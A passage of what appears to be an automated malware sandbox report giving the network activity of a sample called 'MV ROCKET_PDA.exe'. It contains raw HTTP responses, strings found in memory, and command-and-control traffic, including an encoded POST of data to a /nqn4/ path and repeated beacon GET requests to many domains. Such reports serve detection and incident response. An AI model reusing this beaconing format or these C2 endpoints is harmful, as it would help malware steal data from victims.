66 66 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 7d 61 7b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 63 6f 6c 6f 72 3a 23 32 34 39 38 65 33 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 7d 61 3a 61 63 74 69 76 65 2c 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 63 6f 6c 6f 72 3a 23 31 38 38 64 64 39 3b 6f 75 74 6c 69 6e 65 3a 30 7d 68 31 2c 68 32 7b 6d 61 72 67 69 6e 3a 30 20 30 20 2e 35 72 65 6d 3b 63 6f 6c 6f 72 3a 23 34 34 34 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 72 65 6d 7d 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 2e 36 72 65 6d 7d 2e 65 72 72 6f 72 2d 63 6f 64 65 7b 63 6f 6c 6f 72 3a 23 66 34 37 37 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 38 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 7d 70 7b 6d 61 72 67 69 6e 3a 31 2e 32 72 65 6d 20 30 7d 70 2e 6c 65 61 64 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 36 72 65 6d 3b 63 6f 6c 6f 72 3a 23 34 66 35 61 36 34 7d 68 72 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Fri, 08 Oct 2021 08:02:43 GMTContent-Type: text/htmlContent-Length: 275ETag: "615f93b1-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 08 Oct 2021 08:02:56 GMTContent-Type: text/html; charset=UTF-8Content-Length: 59030Connection: closeServer: Apache/2X-Powered-By: PHP/7.4.10Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://ad.aqisolution.com/wp-json/>; rel="https://api.w.org/"X-Endurance-Cache-Level: 2Age: 2Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 72 74 6c 22 20 6c 61 6e 67 3d 22 61 72 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 6e 6f 2d 73 76 67 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 0d 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 68 74 6d 6c 29 7b 68 74 6d 6c 2e 63 6c 61 73 73 4e 61 6d 65 20 3d 20 68 74 6d 6c 2e 63 6c 61 73 73 4e 61 6d 65 2e 72 65 70 6c 61 63 65 28 2f 5c 62 6e 6f 2d 6a 73 5c 62 2f 2c 27 6a 73 27 29 7d 29 28 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 74 69 74 6c 65 3e d8 a7 d9 84 d8 b5 d9 81 d8 ad d8 a9 20 d8 ba d9 8a d8 b1 20 d9 85 d9 88 d8 ac d9 88 d8 af d8 a9 2e 20 26 23 38 32 31 31 3b 20 d8 a7 d9 8a 20 d8 aa d8 ac d8 a7 d8 b1 d8 a9 20 41 54 52 41 44 45 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 61 64 2e 61 71 69 73 6f 6c 75 74 69 6f 6e 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 73 2e 77 2e 6f 72 67 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 27 20 63 72 6f 73 73 6f 72 69 67 69 6e 20 72 65 6c 3d 27 70 72 65 63 6f 6e 6e 65 63 74 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 d8 a7 d9 8a 20 d8 aa d8 ac d8 a7 d8 b1 d8 a9 20 41 54 52 41 44 45 20 26 6c 61 71 75 6f 3b 20 d8 a7 d9 84 d8 ae d9 84 d8 a7 d8 b5 d8 a9 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 64 2e 61 71 69 73 6f 6c 75 74 69 6f 6e 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 d8 a7 d9 8a 20 d8 aa d8 ac d8 a7 d8 b1 d8
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETX-Powered-By-Plesk: PleskWinDate: Fri, 08 Oct 2021 08:03:05 GMTConnection: closeContent-Length: 12579Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0d 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 3c 73 74 79 6c 65 3e 68 74 6d 6c 7b 6f 76 65 72 66 6c 6f 77 2d 79 3a 73 63 72 6f 6c 6c 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 66 6f 6e 74 3a 34 30 30 20 36 32 2e 35 25 2f 31 2e 34 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 2d 6d 73 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 74 61 70 2d 68 69 67 68 6c 69 67 68 74 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 7d 62 6f 64 79 2c 68 74 6d 6c 7b 68 65 69 67 68 74 3a 31 30 30 25 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 33 72 65 6d 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 7d 61 7b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 63 6f 6c 6f 72 3a 23 32 34 39 38 65 33 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 7d 61 3a 61 63 74 69 76 65 2c 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 63 6f 6c 6f 72 3a 23 31 38 38 64 64 39 3b 6f 75 74 6c 69 6e 65 3a 30 7d 68 31 2c 68 32 7b 6d 61 72 67 69 6e 3a 30 20 30 20 2e 35 72 65 6d 3b 63 6f 6c 6f 72 3a 23 34 34 34 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 72 65 6d 7d 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 2e 36 72 65 6d 7d 2e 65 72 72 6f 72 2d 63 6f 64 65 7b 63 6f 6c 6f 72 3a 23 66 34 37 37 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 38 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 7d 70 7b 6d 61 72 67 69 6e 3a 31 2e 32 72 65 6d 20 30 7d 70 2e 6c 65 61 64 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 36 72 65 6d 3b 63 6f 6c 6f 72 3a 23 34 66 35 61 36 34 7d 68 72 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 08 Oct 2021 08:03:17 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Sorting-Hat-PodId: 155X-Sorting-Hat-ShopId: 57051775132X-Request-ID: b9d9a923-e41f-4574-b3bc-b943bca5839fX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Download-Options: noopenX-Content-Type-Options: nosniffX-Dc: gcp-europe-west1CF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 69adda134bf42bc6-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css">
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 08 Oct 2021 08:03:28 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 277Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 62 72 61 73 62 75 78 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.brasbux.com Port 80</address></body></html>
          Source: 5jsdph8p9l_r.exe, 5jsdph8p9l_r.exe, 00000027.00000002.776362591.0000000000409000.00000004.00020000.sdmp, 5jsdph8p9l_r.exe, 00000028.00000000.770366097.0000000000409000.00000008.00020000.sdmp, 5jsdph8p9l_r.exe, 00000029.00000002.791582542.0000000000409000.00000004.00020000.sdmp, 5jsdph8p9l_r.exe, 0000002A.00000000.786981832.0000000000409000.00000008.00020000.sdmp, MV ROCKET_PDA.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: MV ROCKET_PDA.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: rundll32.exe, 0000000D.00000002.802024799.00000000037BD000.00000004.00000020.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
          Source: rundll32.exe, 0000000D.00000002.802978266.000000000603B000.00000004.00020000.sdmpString found in binary or memory: http://www.eco1tnpasumo3.xyz
          Source: rundll32.exe, 0000000D.00000002.802978266.000000000603B000.00000004.00020000.sdmpString found in binary or memory: http://www.eco1tnpasumo3.xyz/nqn4/
          Source: rundll32.exe, 0000000D.00000002.802024799.00000000037BD000.00000004.00000020.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehpLMEM
          Source: rundll32.exe, 0000000D.00000002.801857936.000000000373A000.00000004.00000020.sdmp, rundll32.exe, 0000000D.00000002.801986233.000000000379D000.00000004.00000020.sdmpString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
          Source: rundll32.exe, 0000000D.00000002.802024799.00000000037BD000.00000004.00000020.sdmpString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehpLMEMh8
          Source: rundll32.exe, 0000000D.00000002.802024799.00000000037BD000.00000004.00000020.sdmpString found in binary or memory: http://www.msn.com/de-ch/ocid=iehpN
          Source: rundll32.exe, 0000000D.00000002.801986233.000000000379D000.00000004.00000020.sdmpString found in binary or memory: http://www.msn.com/ocid=iehp
          Source: rundll32.exe, 0000000D.00000002.801986233.000000000379D000.00000004.00000020.sdmpString found in binary or memory: https://www.google.com/chrome/
          Source: rundll32.exe, 0000000D.00000002.802024799.00000000037BD000.00000004.00000020.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
          Source: rundll32.exe, 0000000D.00000002.802024799.00000000037BD000.00000004.00000020.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png~
          Source: rundll32.exe, 0000000D.00000002.801986233.000000000379D000.00000004.00000020.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
          Source: rundll32.exe, 0000000D.00000002.801986233.000000000379D000.00000004.00000020.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0.
          Source: rundll32.exe, 0000000D.00000002.801986233.000000000379D000.00000004.00000020.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.htmlstatcb=0&installdataindex=empty&defaultbrowser=0
          Source: unknownHTTP traffic detected: POST /nqn4/ HTTP/1.1Host: www.geefmijcorona.onlineConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.geefmijcorona.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.geefmijcorona.online/nqn4/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 54 32 4d 70 77 54 3d 34 5a 63 31 38 43 28 6d 34 57 72 59 31 72 4e 4f 4f 77 39 61 67 6f 65 4f 5a 42 36 62 47 49 56 63 69 72 4b 4b 7a 48 69 55 77 74 44 44 34 78 6a 57 44 6c 70 4b 47 32 41 62 4c 30 4f 57 39 56 4b 61 6f 6c 75 4a 67 4c 6b 71 36 4f 75 69 48 66 33 75 66 6d 59 6a 64 5a 62 4c 6d 46 68 77 76 4b 65 57 34 74 49 45 33 30 66 46 6a 57 55 57 79 76 4d 74 6d 6f 68 44 54 4a 62 41 44 33 6b 41 53 75 44 6c 42 39 52 74 35 4d 42 38 72 50 6e 44 64 42 56 69 73 49 52 37 50 2d 57 72 32 6a 6b 41 49 44 44 62 62 4c 7a 61 7e 36 71 55 35 42 62 47 48 79 6c 6d 61 63 74 71 45 30 68 35 4a 45 31 6a 6d 38 77 6d 75 76 5a 38 35 31 35 2d 6e 54 4d 6e 76 75 63 63 4a 4a 54 74 55 55 7e 4c 51 73 62 5f 45 47 76 6d 55 71 44 35 53 4f 63 74 55 62 4b 7a 67 36 57 76 69 48 36 53 59 52 56 33 68 67 4d 47 4f 4a 35 41 4b 63 71 4e 53 64 41 53 38 63 76 6d 50 48 64 44 70 56 74 61 38 4d 52 6f 54 56 69 38 6a 72 36 46 58 33 50 78 36 4d 50 67 39 78 66 41 6d 32 6d 6b 30 61 31 6a 34 31 6d 4e 75 6d 38 33 6b 54 4a 43 38 36 73 50 4e 55 49 53 6a 6f 34 46 30 56 28 35 69 34 79 5f 56 5a 39 66 74 66 45 72 4e 52 6b 62 36 6f 4a 49 58 55 47 2d 6d 6d 7a 58 36 62 7a 58 6f 6d 4d 5a 64 74 42 53 33 6a 69 6e 47 50 52 75 47 51 54 71 7e 42 6d 2d 77 78 49 79 35 6e 69 72 34 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: T2MpwT=4Zc18C(m4WrY1rNOOw9agoeOZB6bGIVcirKKzHiUwtDD4xjWDlpKG2AbL0OW9VKaoluJgLkq6OuiHf3ufmYjdZbLmFhwvKeW4tIE30fFjWUWyvMtmohDTJbAD3kASuDlB9Rt5MB8rPnDdBVisIR7P-Wr2jkAIDDbbLza~6qU5BbGHylmactqE0h5JE1jm8wmuvZ8515-nTMnvuccJJTtUU~LQsb_EGvmUqD5SOctUbKzg6WviH6SYRV3hgMGOJ5AKcqNSdAS8cvmPHdDpVta8MRoTVi8jr6FX3Px6MPg9xfAm2mk0a1j41mNum83kTJC86sPNUISjo4F0V(5i4y_VZ9ftfErNRkb6oJIXUG-mmzX6bzXomMZdtBS3jinGPRuGQTq~Bm-wxIy5nir4Q).
          Source: unknownDNS traffic detected: queries for: www.14attrayanteoffre.com
          Source: global trafficHTTP traffic detected: GET /nqn4/?T2MpwT=i5AiHmtUG4jSq3EeZPtwH7k+iHy5Ue3XoSuQEDxJDegsoJeUadNIxOzHTmstHRTgws5R&VDK0L=5jZhjDchE HTTP/1.1Host: www.14attrayanteoffre.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nqn4/?T2MpwT=NpvTDsLqAO0mKT6/pRGYfFBszb31UzDXQRSyhvlh8npGorp/J75qkvnZqxnVuczwTiaF&VDK0L=5jZhjDchE HTTP/1.1Host: www.buyfood.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nqn4/?T2MpwT=n9MfkADJlGV/yt7v9R1KFrF+APzpIOm/DYQis6iYSXuIjWSgUnKCQKlQm8ZLyuu4NEBr&VDK0L=5jZhjDchE HTTP/1.1Host: www.trust-top.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nqn4/?T2MpwT=eKIp1y2l1SOv2+qM13sD3ni05izmwIgUfk+SveOGf2fPDQ1ngTqk3VQOR6nY8FES9U2Z&VDK0L=5jZhjDchE HTTP/1.1Host: www.palisadestahoeresorts.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nqn4/?T2MpwT=j/acvWTIX1IIGG71msTYH2BmWHO6PBbUk8yOFfU9QnNmzI6YXFgStfXcNuKpZIImGkZw&VDK0L=5jZhjDchE HTTP/1.1Host: www.cmledbetter.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nqn4/?T2MpwT=NO7HiJjWp23E/NVr6f5oxbZpLiVezzkACgfnzaC9yrbwkfp2XaPNKLC9V4BmJOtFaRlB&VDK0L=5jZhjDchE HTTP/1.1Host: www.qgt114.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nqn4/?T2MpwT=vamNjrgbVY8P7naByDvhT5uBlUfF4mww4F7uwpIcOdwQ9dI2x1NbU7t9TbuGfOUGmVqs&VDK0L=5jZhjDchE HTTP/1.1Host: www.serenityminded.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nqn4/?T2MpwT=vhYC9jp4QxyX9P9jU1kmIMvJN+CriLjGecmH3lCQz9Uj4oO69oLOp3ieJLqJz40Fbqlq&VDK0L=5jZhjDchE HTTP/1.1Host: www.alhudadevelopers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nqn4/?T2MpwT=1VzaRmvUXe4pCORdptTlduQET280TPZEdmjA3nEATW/6bXP3pygViu3GMM/9v+eynZ6+&VDK0L=5jZhjDchE HTTP/1.1Host: www.cosmetictreat.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nqn4/?T2MpwT=3boPinz1+GTktZtFPn4Wh9WVNEiaR4p62fPMr1up18b62Q31EEwhNzwdf2qpwnv2m2XV&VDK0L=5jZhjDchE HTTP/1.1Host: www.geefmijcorona.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nqn4/?T2MpwT=vanPYQUuZ3XFRC7SYcRcV+oaGEE9ir47lHLJmRrDHNXTaYXBSumhPRu6vjoy21MSp9tX&VDK0L=5jZhjDchE HTTP/1.1Host: www.eco1tnpasumo3.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nqn4/?CJBlp=0Brh6Vr8UbBX&T2MpwT=59bmqUDXor7TXV4b71NCQ0d0nCVif23i1yH5+9ZmJc5hgCU7y+ZN9z0btTsWzGv6OrGw HTTP/1.1Host: www.ayushigangwar.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nqn4/?T2MpwT=74ly5i6dv9aFaIanl04WAUuvBIDqS28RkAjgjYkeNyzOIPYzy6OHh47fS3mwhl7OaPd1&CJBlp=0Brh6Vr8UbBX HTTP/1.1Host: www.lawsonboards.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
